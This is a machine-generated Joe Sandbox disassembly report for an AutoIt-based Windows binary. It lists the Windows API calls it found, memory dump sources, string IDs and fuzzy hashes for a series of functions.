                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DCA6B9
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00DCA6E9
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00DCA6F4
                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DCA6FF
                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00DCA709
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                  • Opcode ID: 9d72f9de7ec16b179206a0db19394bc5c22ab823bf9a15a70908351705c9703a
                                                                                                                  • Instruction ID: 5cd0c1f90567dcf6ed0240b6bdfbb2d358423674af489d5e8354c53e495d36b6
                                                                                                                  • Opcode Fuzzy Hash: 9d72f9de7ec16b179206a0db19394bc5c22ab823bf9a15a70908351705c9703a
                                                                                                                  • Instruction Fuzzy Hash: 5AA13E71A50219BFEB14DBA9DD49FAE7BBAEB04714F008158F615E72D0D6B0AD00CF64
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBE45E
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00E0DC88,?,\\.\,00E0DBF0), ref: 00DBE54B
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00E0DC88,?,\\.\,00E0DBF0), ref: 00DBE6B1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                  • Opcode ID: 150ca73bd6dc03c7bf9f062ca9ef636058380107884e4ac83a28f3794cfca8e0
                                                                                                                  • Instruction ID: 1eac630a78fbb118a85da1ecc30cc8368012962f995527a0acb58bdec75af542
                                                                                                                  • Opcode Fuzzy Hash: 150ca73bd6dc03c7bf9f062ca9ef636058380107884e4ac83a28f3794cfca8e0
                                                                                                                  • Instruction Fuzzy Hash: 0D51E430208301EBC210EF24D8929E9B7A1FBA4714B659D1AF487B7291EB70DE45DF72
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                  • Opcode ID: bae5377ae3c3463d5bb0f944d65865461ea63acd0093c2280b67501a384bb6b0
                                                                                                                  • Instruction ID: 8fab17558731066507051884305d9c409a5b61d8e44df307d9e9e6a0fc8549b6
                                                                                                                  • Opcode Fuzzy Hash: bae5377ae3c3463d5bb0f944d65865461ea63acd0093c2280b67501a384bb6b0
                                                                                                                  • Instruction Fuzzy Hash: AC61E6316543167FDB25BA649C82FBA339CEF15740F189029F949AB1C2FB60DA41CBB1
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32 ref: 00D74956
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D74998
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D749A3
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00D749AE
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00D749B9
                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DEE179
                                                                                                                  • 6FDA0200.COMCTL32(?,000000FF,?), ref: 00DEE1B2
                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00DEE5E0
                                                                                                                    • Part of subcall function 00D749CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D74954,00000000), ref: 00D74A23
                                                                                                                  • SendMessageW.USER32 ref: 00DEE627
                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DEE63E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 377055139-4108050209
                                                                                                                  • Opcode ID: a90d6b2665b2e22b78f59394d4c179d265565ae13b990cb7aafd40f91e4f7ab2
                                                                                                                  • Instruction ID: 92f8704607ce547a66fd34f6c282a9cc2c5aa943a1d01b5cc0e6300bf22e7252
                                                                                                                  • Opcode Fuzzy Hash: a90d6b2665b2e22b78f59394d4c179d265565ae13b990cb7aafd40f91e4f7ab2
                                                                                                                  • Instruction Fuzzy Hash: 77128D30600241DFDB21EF25C884BAABBA5FF45305F18856DE599CB2A2D731EC45DBB1
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00DDC598
                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00DDC64E
                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00DDC669
                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00DDC925
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                  • Opcode ID: 823f853384162a5171e28d6d021f24f1bf406d5545d2ac227bf8ceddd501f68a
                                                                                                                  • Instruction ID: eb231adb000cc64e699576dc8b61ee265c20f9cd1f0c8e39a2de507de987caba
                                                                                                                  • Opcode Fuzzy Hash: 823f853384162a5171e28d6d021f24f1bf406d5545d2ac227bf8ceddd501f68a
                                                                                                                  • Instruction Fuzzy Hash: DDF1E371214302AFE721CF24C889BAABBE5FF45354F08662AF588D63A1C770D844DB71
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?,00E0DBF0), ref: 00DD6245
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                  • Opcode ID: 07d7150f1669582f5ad9dcd847cafd0242b3f55baf025efb067ac033a34061e5
                                                                                                                  • Instruction ID: 2d2c0c5e1c9516645eadf062226281238e55dd2180128055eb408f19675afa8e
                                                                                                                  • Opcode Fuzzy Hash: 07d7150f1669582f5ad9dcd847cafd0242b3f55baf025efb067ac033a34061e5
                                                                                                                  • Instruction Fuzzy Hash: EAC181742142118FCB08EF14D451A6E77A6EF95354F08486AF8865B3E6DB20ED4ACBF2
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00DDD3BE
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00DDD3C2
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DDD3D8
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00DDD3E3
                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00DDD3E8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00DDD400
                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DDD40E
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DDD41F
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00DDD428
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00DDD435
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00DDD454
                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DDD46B
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00DDD480
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DDD4A8
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DDD4CF
                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00DDD4ED
                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00DDD4F8
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00DDD506
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00DDD50E
                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DDD522
                                                                                                                  • SelectObject.GDI32(?,00DDD0B5), ref: 00DDD539
                                                                                                                  • DeleteObject.GDI32(?), ref: 00DDD544
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00DDD54A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00DDD54F
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00DDD555
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00DDD55F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996641542-0
                                                                                                                  • Opcode ID: 56bc5254e5749983f1898be2ad9b30d9dd43194dd5ffe676b366e00a54b1ee27
                                                                                                                  • Instruction ID: cb2bc966bf22390f79ffddb168f1a4d575e434b4f707250a2ff82a4b7908e7c9
                                                                                                                  • Opcode Fuzzy Hash: 56bc5254e5749983f1898be2ad9b30d9dd43194dd5ffe676b366e00a54b1ee27
                                                                                                                  • Instruction Fuzzy Hash: CA511B71900208BFDF109FA8DC48EAE7BBBEB09320F258515F915EB3A1D7759A40DB60
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DDB5C0
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DDB5D1
                                                                                                                  • CharNextW.USER32(0000014E), ref: 00DDB600
                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DDB641
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DDB657
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DDB668
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DDB685
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00DDB6D7
                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DDB6ED
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DDB71E
                                                                                                                  • _memset.LIBCMT ref: 00DDB743
                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DDB78C
                                                                                                                  • _memset.LIBCMT ref: 00DDB7EB
                                                                                                                  • SendMessageW.USER32 ref: 00DDB815
                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DDB86D
                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00DDB91A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00DDB93C
                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00DDB986
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DDB9B3
                                                                                                                  • DrawMenuBar.USER32(?), ref: 00DDB9C2
                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00DDB9EA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                  • Opcode ID: 9eeec08fc902d3584f74403c77166b976341d91096573db96fc4eb835d48641d
                                                                                                                  • Instruction ID: 58faedd61366e9d5d0d999f0c018f477b69fb40aaf9a8fc03cd3c1ad8b758add
                                                                                                                  • Opcode Fuzzy Hash: 9eeec08fc902d3584f74403c77166b976341d91096573db96fc4eb835d48641d
                                                                                                                  • Instruction Fuzzy Hash: 12E16975900218EBDF209F91CC84AEE7BB9EF05728F15815BF959AA290DB708A41DF70
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DD7587
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DD759C
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DD75A3
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DD7605
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DD7631
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DD765A
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DD7678
                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DD769E
                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00DD76B3
                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DD76C6
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00DD76E6
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DD7701
                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DD7715
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DD772D
                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00DD7753
                                                                                                                  • GetMonitorInfoW.USER32 ref: 00DD776D
                                                                                                                  • CopyRect.USER32(?,?), ref: 00DD7784
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00DD77EF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                  • Opcode ID: bd111b23de3e3af569f12a43678e32e3f31f966f7c0b6a9e8593c98c7c3a7ef2
                                                                                                                  • Instruction ID: baf75425b6143e141f0dbde8b6a1ab588cfb97377eb440041d24b39cf7208758
                                                                                                                  • Opcode Fuzzy Hash: bd111b23de3e3af569f12a43678e32e3f31f966f7c0b6a9e8593c98c7c3a7ef2
                                                                                                                  • Instruction Fuzzy Hash: E2B18071608340AFDB14DF64C948B6ABBE5FF88310F04895EF5999B391E770E805CB62
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8A839
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00D8A841
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8A86C
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00D8A874
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D8A899
                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D8A8B6
                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00D8A8C6
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D8A8F9
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D8A90D
                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00D8A92B
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D8A947
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8A952
                                                                                                                    • Part of subcall function 00D8B736: GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                    • Part of subcall function 00D8B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00D8ACEE), ref: 00D8A979
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                  • Opcode ID: 81a766a990802a4b1b7494e17597f63de53d80292a650657896ae093a4a9293a
                                                                                                                  • Instruction ID: 5d4278cdc3e89c56bc4b86f3c4add9df50f7bfcece2a7a3ef2316af5a2290b2b
                                                                                                                  • Opcode Fuzzy Hash: 81a766a990802a4b1b7494e17597f63de53d80292a650657896ae093a4a9293a
                                                                                                                  • Instruction Fuzzy Hash: 92B17F7160020AEFDB14EFA9DC89BAD7BB5FB48314F11422AFA15E7290D770D841CB65
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00DD6A52
                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DD6B12
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharMessageSendUpper
